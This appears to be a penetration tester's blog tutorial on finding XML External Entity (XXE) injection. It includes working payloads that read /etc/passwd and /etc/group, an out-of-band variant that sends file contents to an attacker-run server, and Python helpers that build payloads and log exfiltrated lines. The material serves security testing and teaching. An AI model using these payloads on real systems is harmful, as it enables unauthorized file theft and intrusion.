General Approach for XML External Entity (XXE) Testing

There are plenty of articles floating around the internet on XML External Entity (XXE) Injection, and they typically describe various payloads, attack vectors, and general use cases for this fun vulnerability. However, back when I was first learning about XXE, I could never find a proper thought process for testing it. After running into XXE during various penetration tests, I've decided to share how I personally test for this vulnerability and, moreover, what my mindset is when I'm on the hunt for XXE.

Check the bottom of this post for some great references and additional guides to XXE which have helped me over the years.

Quick Review: Internal Entities vs External Entities

Before we dive in, knowing the difference between internal and external entities will save you some headaches in the long run. Even though internal entities are not as juicy an attack vector (other than denial of service), they can be very useful as a litmus test for XXE protections.

This is an Internal XML Entity which is used to expand text:

<!DOCTYPE root [
    <!ENTITY my_entity "foo">
]>

<root>Testing for &my_entity;bar expansion</root>

This will render as: Testing for foobar expansion
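To see internal entity expansion happen locally, here is a minimal sketch using Python's standard xml.etree.ElementTree parser. The function name expand_internal is made up for illustration; the document is the one shown above.

```python
import xml.etree.ElementTree as ET

# The internal entity example from above, unchanged.
DOC = """<!DOCTYPE root [
    <!ENTITY my_entity "foo">
]>
<root>Testing for &my_entity;bar expansion</root>"""


def expand_internal(xml_text: str) -> str:
    """Parse xml_text and return the root element's text after entity expansion.

    Hypothetical helper for illustration only.
    """
    return ET.fromstring(xml_text).text


if __name__ == "__main__":
    print(expand_internal(DOC))
```

This only demonstrates internal entities on your own machine; how a target's XML processor behaves is exactly what the rest of this post tries to find out.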

And this is an External Entity, which is supposed to be used to pull in other XML content:

<!DOCTYPE root [
    <!ENTITY my_external_entity SYSTEM "https://www.blah.com/copy.xml">
]>

Here, copy.xml could contain the HTML entity &copy;

<root>Pull in my external entity &my_external_entity; 2019</root>

This will render as: Pull in my external entity ©2019

Now, with that background, we can continue on to my personal attack thought process for XXE.

DOCTYPE Callbacks

First, can I load an external DTD and get a DNS (and hopefully HTTP) callback via a DOCTYPE declaration? When pentesting an internet-facing application, firewall rules or network segmentation will often block HTTP callbacks; as an internal pentester, however, you should be able to receive an HTTP callback most of the time if DNS was at least successful.

<!DOCTYPE dtd SYSTEM "http://###.burpcollaborator.net">

The golden response signaling a great chance at XXE is a valid DNS callback plus a valid HTTP callback. It's important to remember at this stage that getting a connection doesn't mean we'll be able to retrieve any files or perform other malicious actions.

If we do not get back at least a DNS lookup, odds are network controls are preventing any sort of connection from being made, which will make stealing files more difficult if we end up with an OOB exploit. 99% of the time in my XXE experience I've been able to obtain at least a DNS callback; however, your results may vary.
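As a rough sketch of how the callback check can be scripted, the helper below prepends the DOCTYPE declaration to an existing request body. The function name add_doctype_callback and the URL http://callback.example are placeholders of mine, not anything from a real tool; swap in your own collaborator or listener address.

```python
def add_doctype_callback(xml_body: str, callback_url: str, doctype_name: str = "dtd") -> str:
    """Return xml_body with an external-DTD DOCTYPE pointing at callback_url.

    Hypothetical helper: if the body starts with an XML declaration, the
    DOCTYPE is placed right after it, since the declaration must come first.
    """
    doctype = f'<!DOCTYPE {doctype_name} SYSTEM "{callback_url}">'
    body = xml_body.lstrip()
    if body.startswith("<?xml"):
        end = body.index("?>") + 2  # end of the XML declaration
        return body[:end] + "\n" + doctype + body[end:]
    return doctype + "\n" + body


if __name__ == "__main__":
    # callback.example is a placeholder host, not a real listener.
    print(add_doctype_callback("<root><file_uuid>1337</file_uuid></root>",
                               "http://callback.example"))
```

Send the result as the request body and then watch your listener for the DNS and HTTP interactions described above.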

Reflection

The next area I'm keying in on is the application request and response. In order for traditional XXE to be successful, I'm going to need some application request parameter or data reflected back in the response, with several caveats we'll get to in a second. The questions I ask myself are:

  • How does a normal request work on the vulnerable endpoint?
  • Are we getting any reflected content back from our input?

Without understanding or estimating how the application functionally works, or attempting to guess at how it's processing request data, you're going to be blindly throwing payloads at the application hoping for an exploit. You're a better tester than that.

Instead, look at the content of the request and try to understand whether XML parsing is occurring or whether your request is being transformed in some way. For non-XML requests, try to understand why that request type is being transformed into an XML response (and vice versa). I've seen firsthand XML data inside of JSON requests with an XML response, so pay attention to response types!

To the second question: if our input is getting reflected, great! If not, what about an invalid request? Are there verbose errors that would allow our user input to get reflected back there?

For the sake of brevity, the scenario below will be about traditional XML Requests and XML responses.

For example, if we have the following request:

POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<root>
    <file_uuid>1337</file_uuid>
</root>


With the following response:

HTTP 200 OK
Content-type: text/xml

<root>
    <file_uuid>1337</file_uuid>
    <file_name>Hello_World.txt</file_name>
    <file_contents>foobar</file_contents>
</root>

And an invalid request reflects as:


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<root>
    <file_uuid>1337xyzabc</file_uuid>
</root>


With the following response:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337xyzabc</error>
</root>

We can see that the file_uuid element is reflecting its data back in the response from the XML processor, and we can now use this to our advantage. Once we've established that we have reflection, we can begin testing for XXE.
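A quick way to confirm reflection without eyeballing every response is to send a unique marker and search for it. This is a minimal sketch; make_canary and reflection_context are names I made up, and the actual HTTP request is left to whatever client or proxy you already use.

```python
import secrets
from typing import Optional


def make_canary(prefix: str = "xxe") -> str:
    """Return a short random marker that is unlikely to appear in a response by chance."""
    return f"{prefix}{secrets.token_hex(4)}"


def reflection_context(canary: str, response_body: str, width: int = 30) -> Optional[str]:
    """Return the text surrounding the first reflection of canary, or None if absent."""
    index = response_body.find(canary)
    if index == -1:
        return None
    start = max(0, index - width)
    end = index + len(canary) + width
    return response_body[start:end]


if __name__ == "__main__":
    canary = make_canary()
    # Stand-in for a real response body from the vulnerable endpoint.
    body = f"<root><error>Could not find file with uuid 1337{canary}</error></root>"
    print(reflection_context(canary, body))
```

The surrounding context tells you which element or error message your input landed in, which is where you will look for expanded entities next.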

  1. Confirm internal entity expansion to determine if entities are disabled across the board by the XML processor.

POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY internal "foobar">
]>
<root>
    <file_uuid>1337&internal;</file_uuid>
</root>


Will **hopefully** return the following response:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337foobar</error>
</root>

  2. If we have internal entity expansion, let's move on to a pure XXE payload and retrieve a local file. Choose your payload based on the operating system the application is running on (Windows vs Linux). Note: I've started using /etc/group in addition to /etc/passwd as a target file due to file system permission restrictions.


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
    <file_uuid>1337&xxe;</file_uuid>
</root>


Will hopefully return a successful file include:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337  root:!:0:0::/:/usr/bin/sh
daemon:!:1:1::/etc:.......</error>
</root>

  3. Try a parameter entity variant. While parameter entities are typically used in out-of-band variants, they could be fruitful depending on your XML processor, and it's worth the 10 seconds it takes to check.


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY xxe "contents of file: %file;">
]>
<root>
    <file_uuid>1337&xxe;</file_uuid>
</root>


Will **hopefully** return the following response:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337 contents of file:  root:!:0:0::/:/usr/bin/sh
daemon:!:1:1::/etc:.......</error>
</root>

  4. If the above has failed, it's time to move on to the Out of Band variants.
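Steps 1 through 3 above can be sketched as a small payload generator, so the three request bodies are always produced in the same order. The helper names build_body and staged_payloads are my own; the payloads themselves are the ones shown above.

```python
FILE_UUID = "1337"  # the known-good value from the example request


def build_body(doctype_lines, entity_ref):
    """Wrap entity declarations in a DOCTYPE and reference one in file_uuid."""
    subset = "\n".join(f"    {line}" for line in doctype_lines)
    return (
        "<!DOCTYPE root [\n"
        f"{subset}\n"
        "]>\n"
        "<root>\n"
        f"    <file_uuid>{FILE_UUID}{entity_ref}</file_uuid>\n"
        "</root>"
    )


def staged_payloads(target_file="file:///etc/passwd"):
    """Return (stage name, request body) pairs in the order they should be tried."""
    return [
        # Step 1: internal entity, a litmus test for entity handling.
        ("internal", build_body(['<!ENTITY internal "foobar">'], "&internal;")),
        # Step 2: classic external entity reading a local file.
        ("external", build_body([f'<!ENTITY xxe SYSTEM "{target_file}">'], "&xxe;")),
        # Step 3: parameter entity variant; may or may not be accepted by the processor.
        ("parameter", build_body([
            f'<!ENTITY % file SYSTEM "{target_file}">',
            '<!ENTITY xxe "contents of file: %file;">',
        ], "&xxe;")),
    ]


if __name__ == "__main__":
    for name, body in staged_payloads("file:///etc/group"):
        print(f"--- {name} ---\n{body}\n")
```

Stopping at the first stage that fails tells you roughly where the processor draws the line, which is more useful than firing every payload at once.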

Out of Band (OOB)

What we're referring to with 'Out of Band (OOB)' XXE (sometimes referred to as blind XXE) is using XML parameter entities to send the contents of a file to an attacker-controlled web server. We retrieve the contents of a given file and then exfiltrate one line of that data via a GET request that shows up in the access logs of a web server we're monitoring.

As an attacker, I will typically spin up Python's SimpleHTTPServer module (over HTTP or HTTPS) in order to serve up my various XML payloads. Here is a link on how to set up an HTTPS variant of this module.
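If you would rather have the requests collected in a list than read them from a terminal, here is a minimal sketch built on Python 3's http.server (the successor to SimpleHTTPServer). The make_server function and the in-memory payloads dictionary are my own illustration, not part of any existing tool, and this plain-HTTP version does not cover the HTTPS variant.

```python
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def make_server(payloads, host="127.0.0.1", port=0):
    """Build a server that serves payloads by path and records every GET it sees.

    payloads maps a path such as "/dtd.xml" to the text to return.
    Returns (server, hits); hits is a list of raw request paths, in order.
    """
    hits = []

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            hits.append(self.path)  # keep the raw path, query string included
            body = payloads.get(self.path.split("?", 1)[0])
            if body is None:
                self.send_response(404)
                self.end_headers()
                return
            data = body.encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "application/xml")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, format, *args):
            pass  # silence the default stderr log; hits is our access log

    return ThreadingHTTPServer((host, port), Handler), hits
```

To use it, call make_server with your payloads, run server.serve_forever() (in a thread if you want to keep working in the same session), and inspect hits afterwards. For quick jobs, running python3 -m http.server in the payload directory gives you the same access log on the terminal.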

From my personal experience with OOB XXE variants, there is a single requirement which needs to be met in order for you to continue on to more interesting exfiltration vectors such as FTP (for multiline file retrieval):

A parameter entity nested inside of an entity must expand when called.


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY % param "foobar">
    <!ENTITY xxe SYSTEM "http://127.0.0.1/%param;">
]>
<root>
    <file_uuid>1337 &xxe;</file_uuid>
</root>


The application can return any response; what matters is the request that arrives at your web server, which is where you check for expansion:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337</error>
</root>

[Image: XXE Python Simple HTTP Server]

If you were successful, congrats: you've got OOB XXE and can exfiltrate data one line at a time via GET requests in your access logs.
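Telling success from failure comes down to what path shows up in the access log: a request for /foobar means the parameter entity expanded, while a request containing a literal %param means it did not. A minimal sketch of that check, with classify_oob_hit being a hypothetical helper name:

```python
from urllib.parse import unquote


def classify_oob_hit(path: str, expected: str = "foobar", param_name: str = "param") -> str:
    """Classify a logged request path from the nested-parameter test.

    Returns "literal" if the unexpanded %param reference arrived as-is
    (possibly percent-encoded as %25param), "expanded" if the expected
    value arrived, and "unknown" for anything else.
    """
    decoded = unquote(path)
    needle = f"%{param_name}"
    if needle in path or needle in decoded:
        return "literal"
    if expected in decoded:
        return "expanded"
    return "unknown"


if __name__ == "__main__":
    for logged in ("/foobar", "/%param;", "/%25param;", "/favicon.ico"):
        print(logged, "->", classify_oob_hit(logged))
```

The percent-encoded case is included because some HTTP clients encode the % sign before sending the request; treat that as an assumption to verify against your own logs.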

If you do not receive a GET to /foobar, and instead receive a GET to /%param, we're going to have to dive quite a bit deeper into various request types. The next major variant attempts to have the entity declaration itself written into the DOCTYPE so that the expansion triggers there, rather than triggering the expansion inline. There are several different types of payloads here which all may work (we're starting to have to guess a bit and see what sticks):


POST /get_file HTTP/1.1
Host: blah.com
Content-type: text/xml
Content-length: 0

<!DOCTYPE root [
    <!ENTITY % param SYSTEM "http://127.0.0.1/dtd.xml">
    %param;
    %p;
]>
<root>
    <file_uuid>1337 &xxe;</file_uuid>
</root>

Our external DTD file (dtd.xml) contains the following:

<!ENTITY % exfil SYSTEM "file:///etc/group">
<!ENTITY % p "<!ENTITY xxe SYSTEM 'http://127.0.0.1/?%exfil;'>">

Again, the application can return any response; what matters is the request that arrives at your web server, which is where you check for expansion:

HTTP 404 NOT FOUND
Content-type: text/xml

<root>
    <error>Could not find file with uuid 1337</error>
</root>

[Image: XXE showing line 1 of /etc/group returned]

  1. %param; is referenced, which triggers a connection to our remote server for the "dtd.xml" file.
  2. %p has now been loaded into the DTD of our current XML document, so we can reference %p; to write the xxe entity declaration into the DTD.
  3. During this write, the %exfil parameter entity is expanded, which triggers a file retrieval of /etc/group and stores the contents in %exfil.
  4. Lastly, &xxe; is referenced, which sends the data back to our server, where the first line of /etc/group (the root entry) is retrieved and logged.
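The external DTD and the log-reading side of this flow can be sketched as two small helpers. Both names, build_external_dtd and extract_exfil, are mine, and the group entry in the usage example is a made-up value for illustration rather than output from a real target.

```python
from urllib.parse import unquote, urlsplit


def build_external_dtd(target_file: str, callback_base: str) -> str:
    """Return the dtd.xml contents: read target_file, then define xxe to send it home."""
    base = callback_base.rstrip("/")
    return (
        f'<!ENTITY % exfil SYSTEM "{target_file}">\n'
        f'<!ENTITY % p "<!ENTITY xxe SYSTEM \'{base}/?%exfil;\'>">'
    )


def extract_exfil(request_path: str) -> str:
    """Pull the exfiltrated line out of a logged request path such as '/?root%3Ax%3A0%3A'."""
    return unquote(urlsplit(request_path).query)


if __name__ == "__main__":
    print(build_external_dtd("file:///etc/group", "http://127.0.0.1"))
    # Hypothetical logged path, shown only to illustrate the decoding step.
    print(extract_exfil("/?root%3Ax%3A0%3A"))
```

Generating dtd.xml from a function makes it easy to swap the target file or callback address between attempts without hand-editing nested quotes.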

If that example does not work, feel free to seek out additional payloads at this point, as they all follow that same structure for the most part. It all revolves around how the XML processor actually expands parameter entities when making HTTP connections.

Wrap Up

At a high level, that was my basic approach to testing for XXE. There are a lot more payloads and examples that I have not covered, as they're not really necessary here and other articles cover them in more detail (see staaldraad's FTP link at the bottom). I'll continue to update this page as I flesh out and discover new techniques for XXE testing.


References

Note                        Link
XXE Payloads                PayloadsAllTheThings XXE
XXE Payloads 2              staaldraad XXE
Whitepaper (A Must Read)    VSecurity XML DTD Entity Attacks
XXE Overview Slides         OWASP XXE Presentation
Forcing Errors              NetSPI Forcing XXE Reflection
FTP XXE                     staaldraad XXE via FTP